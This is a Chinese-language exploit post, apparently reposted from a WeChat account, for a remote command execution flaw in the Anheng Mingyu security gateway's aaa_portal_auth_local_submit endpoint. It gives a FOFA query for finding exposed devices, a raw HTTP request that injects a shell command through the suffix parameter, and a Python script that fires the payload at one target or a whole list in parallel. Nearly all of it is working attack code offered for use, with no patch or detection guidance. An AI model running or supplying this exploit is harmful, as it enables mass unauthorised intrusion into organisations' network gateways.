安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞
FOFA:body="/webui/images/basic/login/" && title=="明御安全网关"
复现步骤
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
路径:http://www.example.com/test.txt
批量脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Time : 2023/8/15 18:28
# Author : yunkong
# FileName : DAS_Gateway_Rce.py
# Description: 安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞
import argparse
import requests
import concurrent.futures
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
proxy = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
def send_get_request(url):
exploit_url = f"{url}/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(`id+>/usr/local/webui/test.txt`)}}"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/35.0.1916.47 Safari/537.36",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded",
"Accept-Encoding": "gzip",
}
try:
with requests.Session() as session:
response = session.get(exploit_url,
# proxies=proxy,
headers=headers
)
if response.status_code == 200 and ""success":"local_logo"" in response.text:
logging.info(f"[+] Successful exploit, result: {url}/test.txt")
else:
pass
logging.error(f"[-] Failed exploit, result: {url}")
except requests.exceptions.RequestException as e:
logging.error(f"[-] HTTP request failed, result: {url}")
def main():
parser = argparse.ArgumentParser(description="Exploit script for target URLs")
parser.add_argument("-u", "--url", help="Single target URL")
parser.add_argument("-U", "--url-file", help="File containing multiple target URLs")
args = parser.parse_args()
if args.url:
send_get_request(args.url)
elif args.url_file:
with open(args.url_file, 'r') as url_file:
url_list = [line.strip() for line in url_file]
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
executor.map(send_get_request, url_list)
else:
parser.print_help()
if __name__ == '__main__':
main()
使用方法
# 单个目标
python example.py -u http://example.com
# 多个目标
python example.py -U file_path
原文始发于微信公众号(贫僧法号云空):安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞